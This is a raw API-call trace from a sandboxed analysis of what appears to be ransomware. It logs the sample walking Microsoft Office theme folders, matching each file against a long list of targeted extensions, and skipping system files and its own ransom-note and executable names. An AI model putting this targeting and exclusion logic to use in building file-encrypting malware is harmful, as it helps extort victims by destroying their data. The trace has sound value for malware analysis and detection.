ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x289576aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x289576aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SATIN", cAlternateFileName="")) returned 1 [0317.301] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.301] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SKY", cAlternateFileName="")) returned 1 [0317.301] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.343] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c609b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c609b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="SLATE", cAlternateFileName="")) returned 1 [0317.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\THEMES16\\SLATE") returned 96 [0317.343] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\THEMES16\\SLATE") returned 1 [0317.343] lstrlenW (lpString="SLATE") returned 5 [0317.343] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="SLATE") returned -1 [0317.343] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x40a7ef8 [0317.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\THEMES16\\SLATE") returned 96 [0317.343] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\THEMES16\\SLATE\\*", lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c609b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c609b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39482e8 [0317.344] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c609b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c609b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0317.344] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x27c144f9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0317.344] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0317.344] lstrlenW (lpString=".1cd") returned 4 [0317.344] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0317.344] lstrlenW (lpString=".3ds") returned 4 [0317.344] lstrcmpiW (lpString1=".3ds", lpString2=".GIF") returned -1 [0317.344] lstrlenW (lpString=".3fr") returned 4 [0317.344] lstrcmpiW (lpString1=".3fr", lpString2=".GIF") returned -1 [0317.345] lstrlenW (lpString=".3g2") returned 4 [0317.345] lstrcmpiW (lpString1=".3g2", lpString2=".GIF") returned -1 [0317.345] lstrlenW (lpString=".3gp") returned 4 [0317.345] lstrcmpiW (lpString1=".3gp", lpString2=".GIF") returned -1 [0317.345] lstrlenW (lpString=".7z") returned 3 [0317.345] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0317.345] lstrlenW (lpString=".accda") returned 6 [0317.345] lstrcmpiW (lpString1=".accda", lpString2="EW.GIF") returned -1 [0317.345] lstrlenW (lpString=".accdb") returned 6 [0317.345] lstrcmpiW (lpString1=".accdb", lpString2="EW.GIF") returned -1 [0317.345] lstrlenW (lpString=".accdc") returned 6 [0317.345] lstrcmpiW (lpString1=".accdc", lpString2="EW.GIF") returned -1 [0317.345] lstrlenW (lpString=".accde") returned 6 [0317.345] lstrcmpiW (lpString1=".accde", lpString2="EW.GIF") returned -1 [0317.345] lstrlenW (lpString=".accdt") returned 6 [0317.345] lstrcmpiW (lpString1=".accdt", lpString2="EW.GIF") returned -1 [0317.345] lstrlenW (lpString=".accdw") returned 6 [0317.345] lstrcmpiW (lpString1=".accdw", lpString2="EW.GIF") returned -1 [0317.345] lstrlenW (lpString=".adb") returned 4 [0317.345] lstrcmpiW (lpString1=".adb", lpString2=".GIF") returned -1 [0317.345] lstrlenW (lpString=".adp") returned 4 [0317.345] lstrcmpiW (lpString1=".adp", lpString2=".GIF") returned -1 [0317.345] lstrlenW (lpString=".ai") returned 3 [0317.345] lstrcmpiW (lpString1=".ai", lpString2="GIF") returned -1 [0317.345] lstrlenW (lpString=".ai3") returned 4 [0317.345] lstrcmpiW (lpString1=".ai3", lpString2=".GIF") returned -1 [0317.345] lstrlenW (lpString=".ai4") returned 4 [0317.345] lstrcmpiW (lpString1=".ai4", lpString2=".GIF") returned -1 [0317.345] lstrlenW (lpString=".ai5") returned 4 [0317.345] lstrcmpiW (lpString1=".ai5", lpString2=".GIF") returned -1 [0317.345] lstrlenW (lpString=".ai6") returned 4 [0317.345] lstrcmpiW (lpString1=".ai6", lpString2=".GIF") returned -1 [0317.345] lstrlenW (lpString=".ai7") returned 4 [0317.346] lstrcmpiW (lpString1=".ai7", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".ai8") returned 4 [0317.346] lstrcmpiW (lpString1=".ai8", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".anim") returned 5 [0317.346] lstrcmpiW (lpString1=".anim", lpString2="W.GIF") returned -1 [0317.346] lstrlenW (lpString=".arw") returned 4 [0317.346] lstrcmpiW (lpString1=".arw", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".as") returned 3 [0317.346] lstrcmpiW (lpString1=".as", lpString2="GIF") returned -1 [0317.346] lstrlenW (lpString=".asa") returned 4 [0317.346] lstrcmpiW (lpString1=".asa", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".asc") returned 4 [0317.346] lstrcmpiW (lpString1=".asc", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".ascx") returned 5 [0317.346] lstrcmpiW (lpString1=".ascx", lpString2="W.GIF") returned -1 [0317.346] lstrlenW (lpString=".asm") returned 4 [0317.346] lstrcmpiW (lpString1=".asm", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".asmx") returned 5 [0317.346] lstrcmpiW (lpString1=".asmx", lpString2="W.GIF") returned -1 [0317.346] lstrlenW (lpString=".asp") returned 4 [0317.346] lstrcmpiW (lpString1=".asp", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".aspx") returned 5 [0317.346] lstrcmpiW (lpString1=".aspx", lpString2="W.GIF") returned -1 [0317.346] lstrlenW (lpString=".asr") returned 4 [0317.346] lstrcmpiW (lpString1=".asr", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".asx") returned 4 [0317.346] lstrcmpiW (lpString1=".asx", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".avi") returned 4 [0317.346] lstrcmpiW (lpString1=".avi", lpString2=".GIF") returned -1 [0317.346] lstrlenW (lpString=".avs") returned 4 [0317.347] lstrcmpiW (lpString1=".avs", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".backup") returned 7 [0317.347] lstrcmpiW (lpString1=".backup", lpString2="IEW.GIF") returned -1 [0317.347] lstrlenW (lpString=".bak") returned 4 [0317.347] lstrcmpiW (lpString1=".bak", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".bay") returned 4 [0317.347] lstrcmpiW (lpString1=".bay", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".bd") returned 3 [0317.347] lstrcmpiW (lpString1=".bd", lpString2="GIF") returned -1 [0317.347] lstrlenW (lpString=".bin") returned 4 [0317.347] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".bmp") returned 4 [0317.347] lstrcmpiW (lpString1=".bmp", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".bz2") returned 4 [0317.347] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".c") returned 2 [0317.347] lstrcmpiW (lpString1=".c", lpString2="IF") returned -1 [0317.347] lstrlenW (lpString=".cdr") returned 4 [0317.347] lstrcmpiW (lpString1=".cdr", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".cer") returned 4 [0317.347] lstrcmpiW (lpString1=".cer", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".cf") returned 3 [0317.347] lstrcmpiW (lpString1=".cf", lpString2="GIF") returned -1 [0317.347] lstrlenW (lpString=".cfc") returned 4 [0317.347] lstrcmpiW (lpString1=".cfc", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".cfm") returned 4 [0317.347] lstrcmpiW (lpString1=".cfm", lpString2=".GIF") returned -1 [0317.347] lstrlenW (lpString=".cfml") returned 5 [0317.347] lstrcmpiW (lpString1=".cfml", lpString2="W.GIF") returned -1 [0317.348] lstrlenW (lpString=".cfu") returned 4 [0317.348] lstrcmpiW (lpString1=".cfu", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".chm") returned 4 [0317.348] lstrcmpiW (lpString1=".chm", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".cin") returned 4 [0317.348] lstrcmpiW (lpString1=".cin", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".class") returned 6 [0317.348] lstrcmpiW (lpString1=".class", lpString2="EW.GIF") returned -1 [0317.348] lstrlenW (lpString=".clx") returned 4 [0317.348] lstrcmpiW (lpString1=".clx", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".config") returned 7 [0317.348] lstrcmpiW (lpString1=".config", lpString2="IEW.GIF") returned -1 [0317.348] lstrlenW (lpString=".cpp") returned 4 [0317.348] lstrcmpiW (lpString1=".cpp", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".cr2") returned 4 [0317.348] lstrcmpiW (lpString1=".cr2", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".crt") returned 4 [0317.348] lstrcmpiW (lpString1=".crt", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".crw") returned 4 [0317.348] lstrcmpiW (lpString1=".crw", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".cs") returned 3 [0317.348] lstrcmpiW (lpString1=".cs", lpString2="GIF") returned -1 [0317.348] lstrlenW (lpString=".css") returned 4 [0317.348] lstrcmpiW (lpString1=".css", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".csv") returned 4 [0317.348] lstrcmpiW (lpString1=".csv", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".cub") returned 4 [0317.348] lstrcmpiW (lpString1=".cub", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".dae") returned 4 [0317.348] lstrcmpiW (lpString1=".dae", lpString2=".GIF") returned -1 [0317.348] lstrlenW (lpString=".dat") returned 4 [0317.349] lstrcmpiW (lpString1=".dat", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".db") returned 3 [0317.349] lstrcmpiW (lpString1=".db", lpString2="GIF") returned -1 [0317.349] lstrlenW (lpString=".dbf") returned 4 [0317.349] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".dbx") returned 4 [0317.349] lstrcmpiW (lpString1=".dbx", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".dc3") returned 4 [0317.349] lstrcmpiW (lpString1=".dc3", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".dcm") returned 4 [0317.349] lstrcmpiW (lpString1=".dcm", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".dcr") returned 4 [0317.349] lstrcmpiW (lpString1=".dcr", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".der") returned 4 [0317.349] lstrcmpiW (lpString1=".der", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".dib") returned 4 [0317.349] lstrcmpiW (lpString1=".dib", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".dic") returned 4 [0317.349] lstrcmpiW (lpString1=".dic", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".dif") returned 4 [0317.349] lstrcmpiW (lpString1=".dif", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".divx") returned 5 [0317.349] lstrcmpiW (lpString1=".divx", lpString2="W.GIF") returned -1 [0317.349] lstrlenW (lpString=".djvu") returned 5 [0317.349] lstrcmpiW (lpString1=".djvu", lpString2="W.GIF") returned -1 [0317.349] lstrlenW (lpString=".dng") returned 4 [0317.349] lstrcmpiW (lpString1=".dng", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".doc") returned 4 [0317.349] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0317.349] lstrlenW (lpString=".docm") returned 5 [0317.349] lstrcmpiW (lpString1=".docm", lpString2="W.GIF") returned -1 [0317.349] lstrlenW (lpString=".docx") returned 5 [0317.349] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0317.350] lstrlenW (lpString=".dot") returned 4 [0317.350] lstrcmpiW (lpString1=".dot", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".dotm") returned 5 [0317.350] lstrcmpiW (lpString1=".dotm", lpString2="W.GIF") returned -1 [0317.350] lstrlenW (lpString=".dotx") returned 5 [0317.350] lstrcmpiW (lpString1=".dotx", lpString2="W.GIF") returned -1 [0317.350] lstrlenW (lpString=".dpx") returned 4 [0317.350] lstrcmpiW (lpString1=".dpx", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".dqy") returned 4 [0317.350] lstrcmpiW (lpString1=".dqy", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".dsn") returned 4 [0317.350] lstrcmpiW (lpString1=".dsn", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".dt") returned 3 [0317.350] lstrcmpiW (lpString1=".dt", lpString2="GIF") returned -1 [0317.350] lstrlenW (lpString=".dtd") returned 4 [0317.350] lstrcmpiW (lpString1=".dtd", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".dwg") returned 4 [0317.350] lstrcmpiW (lpString1=".dwg", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".dwt") returned 4 [0317.350] lstrcmpiW (lpString1=".dwt", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".dx") returned 3 [0317.350] lstrcmpiW (lpString1=".dx", lpString2="GIF") returned -1 [0317.350] lstrlenW (lpString=".dxf") returned 4 [0317.350] lstrcmpiW (lpString1=".dxf", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".edml") returned 5 [0317.350] lstrcmpiW (lpString1=".edml", lpString2="W.GIF") returned -1 [0317.350] lstrlenW (lpString=".efd") returned 4 [0317.350] lstrcmpiW (lpString1=".efd", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".elf") returned 4 [0317.350] lstrcmpiW (lpString1=".elf", lpString2=".GIF") returned -1 [0317.350] lstrlenW (lpString=".emf") returned 4 [0317.351] lstrcmpiW (lpString1=".emf", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".emz") returned 4 [0317.351] lstrcmpiW (lpString1=".emz", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".epf") returned 4 [0317.351] lstrcmpiW (lpString1=".epf", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".eps") returned 4 [0317.351] lstrcmpiW (lpString1=".eps", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".epsf") returned 5 [0317.351] lstrcmpiW (lpString1=".epsf", lpString2="W.GIF") returned -1 [0317.351] lstrlenW (lpString=".epsp") returned 5 [0317.351] lstrcmpiW (lpString1=".epsp", lpString2="W.GIF") returned -1 [0317.351] lstrlenW (lpString=".erf") returned 4 [0317.351] lstrcmpiW (lpString1=".erf", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".exr") returned 4 [0317.351] lstrcmpiW (lpString1=".exr", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".f4v") returned 4 [0317.351] lstrcmpiW (lpString1=".f4v", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".fido") returned 5 [0317.351] lstrcmpiW (lpString1=".fido", lpString2="W.GIF") returned -1 [0317.351] lstrlenW (lpString=".flm") returned 4 [0317.351] lstrcmpiW (lpString1=".flm", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".flv") returned 4 [0317.351] lstrcmpiW (lpString1=".flv", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".frm") returned 4 [0317.351] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".fxg") returned 4 [0317.351] lstrcmpiW (lpString1=".fxg", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".geo") returned 4 [0317.351] lstrcmpiW (lpString1=".geo", lpString2=".GIF") returned -1 [0317.351] lstrlenW (lpString=".gif") returned 4 [0317.351] lstrcmpiW (lpString1=".gif", lpString2=".GIF") returned 0 [0317.351] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0317.351] lstrlenW (lpString=".MSPLT") returned 6 [0317.352] lstrcmpiW (lpString1=".MSPLT", lpString2="EW.GIF") returned -1 [0317.352] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0317.352] lstrcmpiW (lpString1="boot.ini", lpString2="PREVIEW.GIF") returned -1 [0317.352] lstrcmpiW (lpString1="bootfont.bin", lpString2="PREVIEW.GIF") returned -1 [0317.352] lstrcmpiW (lpString1="ntldr", lpString2="PREVIEW.GIF") returned -1 [0317.352] lstrcmpiW (lpString1="ntdetect.com", lpString2="PREVIEW.GIF") returned -1 [0317.352] lstrcmpiW (lpString1="io.sys", lpString2="PREVIEW.GIF") returned -1 [0317.352] lstrcmpiW (lpString1="FILES ENCRYPTED.txt", lpString2="PREVIEW.GIF") returned -1 [0317.352] lstrcmpiW (lpString1="Info.hta", lpString2="PREVIEW.GIF") returned -1 [0317.352] lstrcmpiW (lpString1="wdgmug.exe", lpString2="PREVIEW.GIF") returned 1 [0317.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\THEMES16\\SLATE\\PREVIEW.GIF") returned 108 [0317.352] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x27c609b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c609b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="SLATE.ELM", cAlternateFileName="")) returned 1 [0317.352] lstrlenW (lpString="SLATE.ELM") returned 9 [0317.352] lstrlenW (lpString=".1cd") returned 4 [0317.352] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0317.352] lstrlenW (lpString=".3ds") returned 4 [0317.352] lstrcmpiW (lpString1=".3ds", lpString2=".ELM") returned -1 [0317.352] lstrlenW (lpString=".3fr") returned 4 [0317.352] lstrcmpiW (lpString1=".3fr", lpString2=".ELM") returned -1 [0317.352] lstrlenW (lpString=".3g2") returned 4 [0317.352] lstrcmpiW (lpString1=".3g2", lpString2=".ELM") returned -1 [0317.352] lstrlenW (lpString=".3gp") returned 4 [0317.352] lstrcmpiW (lpString1=".3gp", lpString2=".ELM") returned -1 [0317.352] lstrlenW (lpString=".7z") returned 3 [0317.352] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0317.353] lstrlenW (lpString=".accda") returned 6 [0317.353] lstrcmpiW (lpString1=".accda", lpString2="TE.ELM") returned -1 [0317.353] lstrlenW (lpString=".accdb") returned 6 [0317.353] lstrcmpiW (lpString1=".accdb", lpString2="TE.ELM") returned -1 [0317.353] lstrlenW (lpString=".accdc") returned 6 [0317.353] lstrcmpiW (lpString1=".accdc", lpString2="TE.ELM") returned -1 [0317.353] lstrlenW (lpString=".accde") returned 6 [0317.353] lstrcmpiW (lpString1=".accde", lpString2="TE.ELM") returned -1 [0317.353] lstrlenW (lpString=".accdt") returned 6 [0317.353] lstrcmpiW (lpString1=".accdt", lpString2="TE.ELM") returned -1 [0317.353] lstrlenW (lpString=".accdw") returned 6 [0317.353] lstrcmpiW (lpString1=".accdw", lpString2="TE.ELM") returned -1 [0317.353] lstrlenW (lpString=".adb") returned 4 [0317.353] lstrcmpiW (lpString1=".adb", lpString2=".ELM") returned -1 [0317.353] lstrlenW (lpString=".adp") returned 4 [0317.353] lstrcmpiW (lpString1=".adp", lpString2=".ELM") returned -1 [0317.353] lstrlenW (lpString=".ai") returned 3 [0317.353] lstrcmpiW (lpString1=".ai", lpString2="ELM") returned -1 [0317.353] lstrlenW (lpString=".ai3") returned 4 [0317.353] lstrcmpiW (lpString1=".ai3", lpString2=".ELM") returned -1 [0317.353] lstrlenW (lpString=".ai4") returned 4 [0317.353] lstrcmpiW (lpString1=".ai4", lpString2=".ELM") returned -1 [0317.353] lstrlenW (lpString=".ai5") returned 4 [0317.353] lstrcmpiW (lpString1=".ai5", lpString2=".ELM") returned -1 [0317.353] lstrlenW (lpString=".ai6") returned 4 [0317.353] lstrcmpiW (lpString1=".ai6", lpString2=".ELM") returned -1 [0317.353] lstrlenW (lpString=".ai7") returned 4 [0317.353] lstrcmpiW (lpString1=".ai7", lpString2=".ELM") returned -1 [0317.353] lstrlenW (lpString=".ai8") returned 4 [0317.353] lstrcmpiW (lpString1=".ai8", lpString2=".ELM") returned -1 [0317.353] lstrlenW (lpString=".anim") returned 5 [0317.353] lstrcmpiW (lpString1=".anim", lpString2="E.ELM") returned -1 [0317.353] lstrlenW (lpString=".arw") returned 4 [0317.354] lstrcmpiW (lpString1=".arw", lpString2=".ELM") returned -1 [0317.354] lstrlenW (lpString=".as") returned 3 [0317.354] lstrcmpiW (lpString1=".as", lpString2="ELM") returned -1 [0317.354] lstrlenW (lpString=".asa") returned 4 [0317.354] lstrcmpiW (lpString1=".asa", lpString2=".ELM") returned -1 [0317.354] lstrlenW (lpString=".asc") returned 4 [0317.354] lstrcmpiW (lpString1=".asc", lpString2=".ELM") returned -1 [0317.354] lstrlenW (lpString=".ascx") returned 5 [0317.354] lstrcmpiW (lpString1=".ascx", lpString2="E.ELM") returned -1 [0317.354] lstrlenW (lpString=".asm") returned 4 [0317.354] lstrcmpiW (lpString1=".asm", lpString2=".ELM") returned -1 [0317.354] lstrlenW (lpString=".asmx") returned 5 [0317.354] lstrcmpiW (lpString1=".asmx", lpString2="E.ELM") returned -1 [0317.354] lstrlenW (lpString=".asp") returned 4 [0317.354] lstrcmpiW (lpString1=".asp", lpString2=".ELM") returned -1 [0317.354] lstrlenW (lpString=".aspx") returned 5 [0317.354] lstrcmpiW (lpString1=".aspx", lpString2="E.ELM") returned -1 [0317.354] lstrlenW (lpString=".asr") returned 4 [0317.354] lstrcmpiW (lpString1=".asr", lpString2=".ELM") returned -1 [0317.354] lstrlenW (lpString=".asx") returned 4 [0317.354] lstrcmpiW (lpString1=".asx", lpString2=".ELM") returned -1 [0317.354] lstrlenW (lpString=".avi") returned 4 [0317.354] lstrcmpiW (lpString1=".avi", lpString2=".ELM") returned -1 [0317.354] lstrlenW (lpString=".avs") returned 4 [0317.354] lstrcmpiW (lpString1=".avs", lpString2=".ELM") returned -1 [0317.354] lstrlenW (lpString=".backup") returned 7 [0317.354] lstrcmpiW (lpString1=".backup", lpString2="ATE.ELM") returned -1 [0317.354] lstrlenW (lpString=".bak") returned 4 [0317.354] lstrcmpiW (lpString1=".bak", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".bay") returned 4 [0317.355] lstrcmpiW (lpString1=".bay", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".bd") returned 3 [0317.355] lstrcmpiW (lpString1=".bd", lpString2="ELM") returned -1 [0317.355] lstrlenW (lpString=".bin") returned 4 [0317.355] lstrcmpiW (lpString1=".bin", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".bmp") returned 4 [0317.355] lstrcmpiW (lpString1=".bmp", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".bz2") returned 4 [0317.355] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".c") returned 2 [0317.355] lstrcmpiW (lpString1=".c", lpString2="LM") returned -1 [0317.355] lstrlenW (lpString=".cdr") returned 4 [0317.355] lstrcmpiW (lpString1=".cdr", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".cer") returned 4 [0317.355] lstrcmpiW (lpString1=".cer", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".cf") returned 3 [0317.355] lstrcmpiW (lpString1=".cf", lpString2="ELM") returned -1 [0317.355] lstrlenW (lpString=".cfc") returned 4 [0317.355] lstrcmpiW (lpString1=".cfc", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".cfm") returned 4 [0317.355] lstrcmpiW (lpString1=".cfm", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".cfml") returned 5 [0317.355] lstrcmpiW (lpString1=".cfml", lpString2="E.ELM") returned -1 [0317.355] lstrlenW (lpString=".cfu") returned 4 [0317.355] lstrcmpiW (lpString1=".cfu", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".chm") returned 4 [0317.355] lstrcmpiW (lpString1=".chm", lpString2=".ELM") returned -1 [0317.355] lstrlenW (lpString=".cin") returned 4 [0317.355] lstrcmpiW (lpString1=".cin", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".class") returned 6 [0317.356] lstrcmpiW (lpString1=".class", lpString2="TE.ELM") returned -1 [0317.356] lstrlenW (lpString=".clx") returned 4 [0317.356] lstrcmpiW (lpString1=".clx", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".config") returned 7 [0317.356] lstrcmpiW (lpString1=".config", lpString2="ATE.ELM") returned -1 [0317.356] lstrlenW (lpString=".cpp") returned 4 [0317.356] lstrcmpiW (lpString1=".cpp", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".cr2") returned 4 [0317.356] lstrcmpiW (lpString1=".cr2", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".crt") returned 4 [0317.356] lstrcmpiW (lpString1=".crt", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".crw") returned 4 [0317.356] lstrcmpiW (lpString1=".crw", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".cs") returned 3 [0317.356] lstrcmpiW (lpString1=".cs", lpString2="ELM") returned -1 [0317.356] lstrlenW (lpString=".css") returned 4 [0317.356] lstrcmpiW (lpString1=".css", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".csv") returned 4 [0317.356] lstrcmpiW (lpString1=".csv", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".cub") returned 4 [0317.356] lstrcmpiW (lpString1=".cub", lpString2=".ELM") returned -1 [0317.356] lstrlenW (lpString=".dae") returned 4 [0317.356] lstrcmpiW (lpString1=".dae", lpString2=".ELM") returned -1 